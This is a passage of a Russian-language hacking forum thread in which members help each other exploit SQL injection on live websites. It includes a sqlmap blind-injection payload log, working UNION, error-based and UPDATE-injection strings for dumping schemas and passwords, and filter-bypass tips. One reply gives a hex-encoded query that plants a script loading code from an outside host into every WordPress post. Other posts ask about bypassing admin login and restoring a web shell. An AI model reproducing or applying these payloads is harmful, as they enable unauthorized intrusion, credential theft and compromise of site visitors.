3656c746f6b656e),1,1))>478526),SLEEP(10),9830)
.
[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>192387),SLEEP(10),9830)
.
[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>330357),SLEEP(10),9830)
.
[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>385436),SLEEP(10),9830)
.
[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>145149),SLEEP(10),9830)
.
[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>823404),SLEEP(10),9830)
.
[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>142557),SLEEP(10),9830)
.
[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>848401),SLEEP(10),9830)
.
[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>487756),SLEEP(10),9830)
.
[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>840171),SLEEP(10),9830)
.
[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>800333),SLEEP(10),9830)
.
[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>899978),SLEEP(10),9830)
.
[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>502795),SLEEP(10),9830)
.
[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>128986),SLEEP(10),9830)
.
[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>227072),SLEEP(10),9830)
.
[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>648363),SLEEP(10),9830)
.
[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>656500),SLEEP(10),9830)
.
[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>280401),SLEEP(10),9830)
.
[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>721896),SLEEP(10),9830)
.
[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>769715),SLEEP(10),9830)
.
[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>689458),SLEEP(10),9830)
.
[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>747115),SLEEP(10),9830)
.
[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>103578),SLEEP(10),9830)
. (done)
[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>52),SLEEP(10),9830)
[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>48),SLEEP(10),9830)
[19:42:02] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>1),SLEEP(10),9830)
[19:42:02] [INFO] retrieved:
[19:42:02] [DEBUG] performed 4 queries in 15.59 seconds
[19:42:02] [WARNING] unable to retrieve the number of tables for database 'excel
token'
[19:42:02] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
[19:42:09] [CRITICAL] unable to retrieve the tables in database 'exceltoken'
shutting down at 19:42:09
Octavian
14.10.2017, 20:42
Как в акунетикс настроить скан без тестирование повторяющихся страниц index.php?id=1, index.php?id=2, index.php?id=3
karkajoi
14.10.2017, 22:14
Добрый вечер, вопрос уже задавал не могу найти где мне ответили, вообщем, какой запрос чтоб вывести перечень соседних БД при sql inject?
BadBoris
17.10.2017, 22:42
Всем привет!
Недавно обнаружил, что есть доступ к моим БД извне: nauchniestati.ru/phpmyadmin/
Насколько это опасно? Как это исправить?
Там ещё какие-то ошибки в файлах
./../php/php-gettext/streams.php
./../php/php-gettext/gettext.php
Кто-нибудь может помочь?
Octavian
20.10.2017, 20:24
Интересует возможность SQL Injection при такои фильтрацыии
Code:
function mssql_custom_escape($str, $trim = true, $encode = true) {
if(get_magic_quotes_gpc()) {
$str = stripslashes($str);
}
if ($trim) $str = trim($str);
if ($encode) $str = htmlspecialchars($str);
return preg_replace("#'#", "''", $str);
}
winstrool
20.10.2017, 20:58
Если запрос что то типо:
?id=123+%27+or(ExtractValue(1,version()))+--+\
то как вариант вывод при уязвимом параметре не обремененном кавычками
select * from users where id=123 '' or(ExtractValue(1,version())) -- \
т.е получается как SQLI можно разкрутить, второй пример как вариант обремененными кавычками:
select * from users where id=
'
123 '' or(ExtractValue(1,version())) -- \
'
т.е можно разкрутить как ErrorBased
Octavian
20.10.2017, 23:24
Code:
select * from users where id='123 '' or(ExtractValue(1,version())) -- \'
Непонял получяются 3 кавычке запрос не выполнется
karkajoi
21.10.2017, 00:34
Octavian said:
↑ (https://antichat.live/posts/4140604/)
Code:
select * from users where id='123 '' or(ExtractValue(1,version())) -- \'
Непонял получяются 3 кавычке запрос не выполнется
по пробуй updatexml
panic.ker
22.10.2017, 23:12
garrik said:
↑ (https://antichat.live/posts/4140921/)
Господа, можно ли раскрутить этот баг ? Добавление символов "%2527" к ссылке приводит к такой ошибке
Будут ли какие-то соображения ? буду сильно благодарен любой информации
Иньекция в limit'е после order by. Советую ознакомиться
https://rdot.org/forum/showpost.php?p=36186&postcount=30
Всем привет - Можно ли как то в PhpMyAdmin в базе wp_post - колонка post_content = добавить во все посты сразу, путём составления запроса - свой яваскрипт , если такая возможность есть - напишите.
winstrool
23.10.2017, 17:26
Kirza said:
↑ (https://antichat.live/posts/4141575/)
Всем привет - Можно ли как то в PhpMyAdmin в базе wp_post - колонка post_content = добавить во все посты сразу, путём составления запроса - свой яваскрипт , если такая возможность есть - напишите.
как то так:
update wp_post set post_content=post_content+'JSSCRIPT'
winstrool said:
↑ (https://antichat.live/posts/4141601/)
как то так:
update wp_post set post_content=post_content+'JSSCRIPT'
--- походу не так расписал таблицы #1146 - Table 'wordpress1.wp_post' doesn't exist
БД wordpress1 > wp_post > post_content
BabaDook
23.10.2017, 19:39
Вам пример кинули, вектор, значение вы свои подставляйте .
BabaDook said:
↑ (https://antichat.live/posts/4141659/)
Вам пример кинули, вектор, значение вы свои подставляйте .
Суть понятна - просто текст - добавился на ура - скрипт - не хочет ( пробовал разными путями со скобками - ток же 0
M_script
23.10.2017, 21:25
Kirza said:
↑ (https://antichat.live/posts/4141674/)
Суть понятна - просто текст - добавился на ура - скрипт - не хочет ( пробовал разными путями со скобками - ток же 0
Напиши свой код. Телепатов нет.
Так пашет update wp_posts set post_content=post_content+'123'
так нет update wp_posts set post_content=post_content+''
BabaDook
23.10.2017, 22:29
Kirza said:
↑ (https://antichat.live/posts/4141714/)
Так пашет update wp_posts set post_content=post_content+'123'
так нет update wp_posts set post_content=post_content+''
А толку? Всё равно скрипт не сработает? Иными словами, вы так же можете написать это в форму сообщения. СКРИПТ будет как ткст,
Kirza said:
↑ (https://antichat.live/posts/4141714/)
Так пашет update wp_posts set post_content=post_content+'123'
так нет update wp_posts set post_content=post_content+''
Code:
UPDATE wp_posts SET post_content = CONCAT(post_content, '');
winstrool
24.10.2017, 09:31
Kirza said:
↑ (https://antichat.live/posts/4141714/)
Так пашет update wp_posts set post_content=post_content+'123'
так нет update wp_posts set post_content=post_content+''
Ну засунь значение в хекс:
update wp_posts set post_content=post_content+0x3C73637269707420737263 3D22687474703A2F2F73696E75732E72752F7069642E706870 3F6B79653D3863633362267468726F74746C653D302E352673 655F636865636B3D66616C7365223E3C2F7363726970743E
помогите с решение..
Есть устройство на Уникс..
Подключенно к моей вафле по роутру на Linux
как раскопать хранилище файлов устройсва..
при условии что устройсво у меня в руке.
SSH не удалось из за отсутвия опыта серьёзного
Octavian
24.10.2017, 21:03
КАК ЗАПИСАТЬ ЭТО В .HTACCESS ИЗ ГЛАВНОИ ДИРЕКТОРИИ НО СЫЛАЛОСЬ ТОЛЬКО НА ПАПКИ "files". "images"?
Code:
# Запрещено выполнение любого кода в директории загрузке файлов
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
VKAPI said:
↑ (https://antichat.live/posts/4142060/)
SSH не удалось из за отсутвия опыта серьёзного
https://www.digitalocean.com/commun...e-sshfs-to-mount-remote-file-systems-over-ssh (https://www.digitalocean.com/community/tutorials/how-to-use-sshfs-to-mount-remote-file-systems-over-ssh)
Octavian said:
↑ (https://antichat.live/posts/4142084/)
АК ЗАПИСАТЬ ЭТО В .HTACCESS ИЗ ГЛАВНОИ ДИРЕКТОРИИ НО СЫЛАЛОСЬ ТОЛЬКО НА ПАПКИ "files". "images"?
https://httpd.apache.org/docs/2.4/mod/core.html#directory
foozzione
26.10.2017, 19:48
Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки.
Code:
update users_cards set cardno = ''', name = '' where id_users=65 and id=33
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2
такая же есть с insert
Если где-то видно name, то можно сделать так:
Code:
123', name = version() where id_users=65 and id=33 #
где 123 валидный cardno.
Иначе, крутить как error based, вывод ошибок есть. Материалов на эту тему много.
foozzione
27.10.2017, 00:58
crlf said:
↑ (https://antichat.live/posts/4142780/)
Если где-то видно
name
, то можно сделать так:
Code:
123', name = version() where id_users=65 and id=33 #
где
123
валидный
cardno
.
Иначе, крутить как error based, вывод ошибок есть. Материалов на эту тему много.
коммент не канает... ни --, ни #
foozzione said:
↑ (https://antichat.live/posts/4142801/)
коммент не канает... ни --, ни #
Что пишет?
foozzione said:
↑ (https://antichat.live/posts/4142706/)
Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки.
Code:
update users_cards set cardno = ''', name = '' where id_users=65 and id=33
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2
такая же есть с insert
update users_cards set cardno = '',cardno=version(), name='', name = '' where id_users=65 and id=33
foozzione
27.10.2017, 14:00
crlf said:
↑ (https://antichat.live/posts/4142803/)
Что пишет?
Code:
update users_cards set cardno = '123', name = version() where id_users=65 and id=33 #', name = '' where id_users=66 and id=34
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'name = '' where id_users=66 and id=34' at line 3
foozzione
27.10.2017, 14:01
t0ma5 said:
↑ (https://antichat.live/posts/4142929/)
update users_cards set cardno = '
',cardno=version(), name='
', name = '' where id_users=65 and id=33
сработало! То есть таким образом я в принципе могу с другой таблицы вывести данные?
foozzione said:
↑ (https://antichat.live/posts/4142952/)
сработало! То есть таким образом я в принципе могу с другой таблицы вывести данные?
да, можно через dios составить схему базы http://forum.sqliwiki.com/showthread.php?tid=39 чтоб одним запросом
насчет файлов не проверял, если file_priv = ON возможно получится читать файлы
foozzione
27.10.2017, 14:26
t0ma5 said:
↑ (https://antichat.live/posts/4142954/)
да, можно через dios составить схему базы
http://forum.sqliwiki.com/showthread.php?tid=39
чтоб одним запросом
насчет файлов не проверял, если file_priv = ON возможно получится читать файлы
просмотрел ман, все вроде как понятно, но не могу воспроизвести в update это
foozzione said:
↑ (https://antichat.live/posts/4142962/)
просмотрел ман, все вроде как понятно, но не могу воспроизвести в update это
хз должно работать
Code:
',cardno=(SELECT group_conCat('
',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='
-----------------
ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить
foozzione
27.10.2017, 14:42
t0ma5 said:
↑ (https://antichat.live/posts/4142964/)
хз должно работать
Code:
',cardno=(SELECT group_conCat('
',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='
-----------------
ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить
buh:id,
buhos,
buh:name,
buhrderid,
buh:note,
buh:type_,
buh:active,
buh:val1_name,
buh:val1_amount,
buh:val1_rest,
buh:val1_com,
buh:val2_nam
в name тоже скуля, там места больше, вот что выдало
foozzione
27.10.2017, 14:53
t0ma5 said:
↑ (https://antichat.live/posts/4142964/)
хз должно работать
Code:
',cardno=(SELECT group_conCat('
',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='
-----------------
ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить
кстати, подскажи, как по 1 выводить данные из таблиц и каким образом вывести просто все таблицы из бд, остальное сам докручу уже
foozzione said:
↑ (https://antichat.live/posts/4142972/)
кстати, подскажи, как по 1 выводить данные из таблиц и каким образом вывести просто все таблицы из бд, остальное сам докручу уже
как запросы к information_schema писать чтоль, серьезно)?
Code:
SELECT table_name from information_schema.tables limit 1,1
SELECT column_name from information_schema.columns where table_name='table' limit 1,1
таки вещи давно описаны - /threads/sql-injection-polnyj-faq.43966/ (https://antichat.live/threads/sql-injection-polnyj-faq.43966/)
foozzione
27.10.2017, 15:01
t0ma5 said:
↑ (https://antichat.live/posts/4142975/)
как запросы к information_schema писать чтоль, серьезно)?
Code:
SELECT table_name from information_schema.tables limit 1,1
SELECT column_name from information_schema.tables where table_name='table' limit 1,1
таки вещи давно описаны -
/threads/sql-injection-polnyj-faq.43966/ (https://antichat.live/threads/sql-injection-polnyj-faq.43966/)
да я вялого поймал, запутал сам себя с запросов в update, мало с ним связывался... лул
foozzione said:
↑ (https://antichat.live/posts/4142949/)
Code:
update users_cards set cardno = '123', name = version() where id_users=65 and id=33 #', name = '' where id_users=66 and id=34
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'name = '' where id_users=66 and id=34' at line 3
Мистика После коммента с двумя прочерками пробел ставишь?
foozzione
27.10.2017, 15:41
crlf said:
↑ (https://antichat.live/posts/4142990/)
Мистика
После коммента с двумя прочерками пробел ставишь?
конечно
winstrool
27.10.2017, 23:21
crlf said:
↑ (https://antichat.live/posts/4142990/)
Мистика
После коммента с двумя прочерками пробел ставишь?
Не поверишь!!! иногда благодаря этому и схватывается скуль)))), хз почему так...
в Яблочное хранилище файлов кто нить влазил ? при условии если телефон в руке ?
kacergei
29.10.2017, 03:52
sql-injection
Кто нибудь сталвкивался с фильтрацией знака "_" подчеркивания, его как то можно побороть?
Даже с тем же table_name режет не говоря уже про таблицы с префиксом
kacergei said:
↑ (https://antichat.live/posts/4143583/)
sql-injection
Кто нибудь сталвкивался с фильтрацией знака "_" подчеркивания, его как то можно побороть?
Даже с тем же table_name режет не говоря уже про таблицы с префиксом
двойной урлэнкод, /*%00*/ в начале запроса, запрос можно только одним методом передавать? попробовать другие(GET/POST/COOKIE)
/threads/zadanie-1.453986/page-2#post-4120139 (https://antichat.live/threads/zadanie-1.453986/page-2/) - редкий случай, но тоже может быть
Octavian
29.10.2017, 22:50
Можно провести SQL Injection?
Code:
$login = $_POST['login'];
$login = stripslashes($login);
$login = htmlspecialchars($login);
Octavian said:
↑ (https://antichat.live/posts/4143835/)
Можно провести SQL Injection?
Code:
$login = $_POST['login'];
$login = stripslashes($login);
$login = htmlspecialchars($login);
эм а трабла конкретно в чём? давай подробней
[CODE]
Code:
$ cat 1.php
Octavian
03.11.2017, 22:57
В iframe невозможно открыть страницу если у саита https как у vk например
Можно ли что-то внедрить или считать с базы, если инъекция есть в конце запроса DELETE FROM ?
То есть имеем запрос "DELETE FROM My_Messages WHERE Message_Number =Инъекция
К сожалению база данных не поддерживает разделение запросов с помощью точки с запятой.
garrik said:
↑ (https://antichat.live/posts/4146326/)
Можно ли что-то внедрить или считать с базы, если инъекция есть в конце запроса DELETE FROM ?
Можно. Нужно изучить материал по error и time based инъекциям.
Спасибо, нужно серьезно зарываться в эту тему, за денек такое не осилишь.
Еще вопрос: при такой уязвимости: SELECT subject, message WHERE ID=1'+инъекция, создается таблица с двумя строками, первая строка - данные "subject, message", вторая - данные, полученные с помощью оператора UNION инъекции. Проблема в том, что выводится в браузере только первая строка. Можно ли как-то вывести данные со второй строки ? Может есть возможность как-то соединить две строки в одну в одном запросе ? При ID=-1 ничего не выводит
garrik said:
↑ (https://antichat.live/posts/4146513/)
как-то соединить две строки в одну
Пост не осилил. Исходя из того, что удалось понять, стоит смотреть в сторону мануалов и изучения синтаксиса запросов. К примеру, в MySQL строки можно объеденить используя CONCAT.
Может неправильно выразился, примерный код вместе с инъекцией: SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1
формирует таблицу с двумя строками, в браузере выводится только первая, а мне нужна вторая (с паролем). О CONCAT думал, сейчас читаю о ней.....
garrik said:
↑ (https://antichat.live/posts/4146638/)
Может неправильно выразился, примерный код вместе с инъекцией: SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1
формирует таблицу с двумя строками, в браузере выводится только первая, а мне нужна вторая (с паролем). О CONCAT думал, сейчас читаю о ней.....
SELECT subject, message FROM messages WHERE id=1 UNION SELECT concat(user,':',password),2 FROM users WHERE id=1
garrik said:
↑ (https://antichat.live/posts/4146638/)
Может неправильно выразился, примерный код вместе с инъекцией: SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1
формирует таблицу с двумя строками, в браузере выводится только первая, а мне нужна вторая (с паролем). О CONCAT думал, сейчас читаю о ней.....
Нужная строки выбирается limit n-1,1.
SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1 limit 1,1
мб кто вкурсе, можно ли в wordpress авторизоваться в админку не через wp-login.php? на нее штака стоит. На /wp-admin/ пускает но редиректит, куки админа не перехватить, но админские аккаунты имеются, какие есть варианты?
Br@!ns said:
↑ (https://antichat.live/posts/4147325/)
мб кто вкурсе, можно ли в wordpress авторизоваться в админку не через wp-login.php? на нее штака стоит. На /wp-admin/ пускает но редиректит, куки админа не перехватить, но админские аккаунты имеются, какие есть варианты?
Действительно ли это админка? Подходит ли пароль к мылу, к фтп, и прочим сервисам?
Mobilesouyhj
10.11.2017, 14:09
Что можно сделать с этой скулей? http://www.civildignity.ru/site_dev.php/ru/organisation_catalog/gallery/1631/fond_-inok-_den_za_dnem' как вытянуть бд? И где там админка?
С чего вы взяли что это скуля?
Warning: realpath(): open_basedir restriction in effect. File(/usr/share/php) is not within the allowed path(s): (/var/www/civil/data:.) in /var/www/civil/data/www/_symfony-1.4.19/lib/util/sfToolkit.class.php on line 592
В самой ошибке ответ на все.
Mobilesouyhj
10.11.2017, 18:16
Gorev said:
↑ (https://antichat.live/posts/4148230/)
С чего вы взяли что это скуля?
Warning
: realpath(): open_basedir restriction in effect. File(/usr/share/php) is not within the allowed path(s): (/var/www/civil/data:.) in
/var/www/civil/data/www/_symfony-1.4.19/lib/util/sfToolkit.class.php
on line
592
В самой ошибке ответ на все.
Т.е. залится не получится?
Mobilesouyhj said:
↑ (https://antichat.live/posts/4148233/)
Т.е. залится не получится?
Такое ощущение что вы где то услышали термины: скуля,админка,залится и используете их не понимая смысла.
1.определить если есть ошибка
2.определить вектор атаки
3. Эксплуатируй уязвимость
4.используйте полученную информацию для получения доступа
В твоём случае к чему вопрос о заливке если даже намека на уязвимость нет,не считая раскрытие путей,найди инъекцию,посмотри на права юзера,если file_priv=on,тогда задавай вопрос о заливке,или же получи данные от панели управления и тогда задавай вопрос о заливке,или вылови куки админа,и тогда задавай вопрос о заливке. Можно продолжать долго...
Mobilesouyhj
10.11.2017, 20:05
Gorev said:
↑ (https://antichat.live/posts/4148263/)
Такое ощущение что вы где то услышали термины: скуля,админка,залится и используете их не понимая смысла.
1.определить если есть ошибка
2.определить вектор атаки
3. Эксплуатируй уязвимость
4.используйте полученную информацию для получения доступа
В твоём случае к чему вопрос о заливке если даже намека на уязвимость нет,не считая раскрытие путей,найди инъекцию,посмотри на права юзера,если file_priv=on,тогда задавай вопрос о заливке,или же получи данные от панели управления и тогда задавай вопрос о заливке,или вылови куки админа,и тогда задавай вопрос о заливке. Можно продолжать долго...
Да там нет уязвимостей я уже протестил, за то сайт весь на ошибках )) кстати : on /phpinfo.php
Что-on? Если про file_priv,то мне кажется вы что то путаете.
Mobilesouyhj
10.11.2017, 20:40
Mobilesouyhj said:
↑ (https://antichat.live/posts/4148289/)
Да там нет уязвимостей, за то сайт весь на ошибках ))
Gorev said:
↑ (https://antichat.live/posts/4148290/)
Что-on? Если про file_priv,то мне кажется вы что то путаете.
Там не одной скули нет
Вопрос такой.
Есть иньекция на сайте. Таблицы выдергиваются из базы "А".
На сервере под одним пользователем крутиться 3 базы: А. Б.С.
Как составить запрос, чтобы можно выдернуть таблицы, колонки из базы Б и С?
Так берутся данные из базы А.
http://site/shop.php?id=-260+union+select+1,2,3,4,5,table_name,7,8,9,10,11, 12,13,14 FROM INFORMATION_SCHEMA.TABLES -- (http://site/shop.php?id=-260+union+select+1,2,3,4,5,table_name,7,8,9,10,11, 12,13,14%20FROM%20INFORMATION_SCHEMA.TABLES%20--)
sqlmap не советуйте, сервер настроен так, что надо ручками.
Когда я написал этот пост я не остановился. Я стал искать дальше и выяснил, что это можно сделать следующим запросом:
http://site/shop/shop.php?id=-260+u...n_schema.tables WHERE table_schema=0x63172 -- (http://site/shop/shop.php?id=-260+union+select+1,2,3,group_concat(table_name+SEP ARATOR+0x0b),5,6,7,8,9,10,11,12,13,14%20FROM%20inf ormation_schema.tables%20WHERE%20table_schema=0x63 172%20--)
group_concat(table_name+SEPARATOR+0x0b) - выводит список таблиц
FROM%20information_schema.tables%20WHERE%20table_s chema=0x6372%20-- - откуда брать таблицы.
ЗаHEXованная строчка - это название базы данных.
ну и колонки это:
http://localhost/sql.php?id=-1+UNIO...schema=0x74657374+AND+table_name=0x757365 7273 (http://localhost/sql.php?id=-1+UNION+SELECT+1,group_concat(column_name+SEPARATO R+0x0b)+FROM+information_schema.columns+WHERE+tabl e_schema=0x74657374+AND+table_name=0x7573657273)
Muracha said:
↑ (https://antichat.live/posts/4148617/)
Вопрос такой.
https://rdot.org/forum/showthread.php?t=60
Muracha said:
↑ (https://antichat.live/posts/4148617/)
Как составить запрос...
Code:
http://site/shop.php?id=-260+union+select+1,2,3,4,5,(select(@n)from(select( @n:=0x20),(select(null)from(information_schema.col umns)where(0x2b)in(@n:=concat(@n,0x3c62723e,table_ schema,0x2e,table_name,0x3a,column_name))and(table _schema!=0x696e666f726d6174696f6e5f736368656d61))) n),7,8,9,10,11,12,13,14-- -
Для ознакомления прочтите (https://defcon.ru/web-security/2320/)
Muracha said:
↑ (https://antichat.live/posts/4148617/)
sqlmap не советуйте, сервер настроен так, что надо ручками.
level и risk выставлял ?
karkajoi
12.11.2017, 04:16
Sensoft said:
↑ (https://antichat.live/posts/4148670/)
level
и
risk
выставлял ?
Причем тут лвл и риск ? Говорит же что sqlmap не катит
Господа, такой вопрос: есть инъекция, позволяющая выводить содержимое любой ячейки таблицы в поле формы на веб-странице (после "правильного" POST-запроса). Как можно слить через эту лазейку всю базу ? Структура таблиц базы известна. Есть ли тулза какая-то для этого или нужно самому писать скрипт ?
BabaDook
13.11.2017, 03:07
garrik said:
↑ (https://antichat.live/posts/4148997/)
Господа, такой вопрос: есть инъекция, позволяющая выводить содержимое любой ячейки таблицы в поле формы на веб-странице (после "правильного" POST-запроса). Как можно слить через эту лазейку всю базу ? Структура таблиц базы известна. Есть ли тулза какая-то для этого или нужно самому писать скрипт ?
sqlmap
gena ryzhov
25.11.2017, 05:01
Всем доброй ночи!
хочу вернуть доступ к консоли через веб шелл, ранее юзал mail(), а потом mb_send_mail(), их закрыли, уже все функции в доках перерыл, не нашел ничего, open_basedir от корня сайта и /tmp , через бд файлы не читаются
Собственно модули апача и список выключенных функций:
Loaded Apache modules: core, mod_so, http_core, mod_php5, mod_access_compat, mod_actions, mod_alias, mod_auth_basic, mod_authn_core, mod_authn_file, mod_authz_core, mod_authz_groupfile, mod_authz_host, mod_authz_user, mod_autoindex, mod_dir, mod_env, mod_filter, mod_headers, mod_include, mod_log_config, mod_logio, mod_mime, mod_negotiation, mod_remoteip, mod_rewrite, mod_setenvif, mod_status, mod_unixd, mod_userdir, mod_version, prefork, mod_ssl, mod_systemd, mod_cgi
Disabled PHP Functions: exec,system,passthru,shell_exec,popen,show_source, posix_getpwuid,posix_setuid,posix_uname,cmd,escape shellcmd,popen,proc_open,dbmopen,suexec,pcntl_exec ,phpinfo,php_uname,mail,mb_send_mail
Крик души! Если есть какие-нибудь варианты буду рад обсудить!
P.S.
Смотрю в сторону использования CGI , PERL, но ничего не смыслю в этом!
gena ryzhov said:
↑ (https://antichat.live/posts/4153193/)
Всем доброй ночи!
хочу вернуть доступ к консоли через веб шелл, ранее юзал mail(), а потом mb_send_mail(), их закрыли, уже все функции в доках перерыл, не нашел ничего, open_basedir от корня сайта и /tmp , через бд файлы не читаются
Собственно модули апача и список выключенных функций:
Loaded Apache modules: core, mod_so, http_core, mod_php5, mod_access_compat, mod_actions, mod_alias, mod_auth_basic, mod_authn_core, mod_authn_file, mod_authz_core, mod_authz_groupfile, mod_authz_host, mod_authz_user, mod_autoindex, mod_dir, mod_env, mod_filter, mod_headers, mod_include, mod_log_config, mod_logio, mod_mime, mod_negotiation, mod_remoteip, mod_rewrite, mod_setenvif, mod_status, mod_unixd, mod_userdir, mod_version, prefork, mod_ssl, mod_systemd, mod_cgi
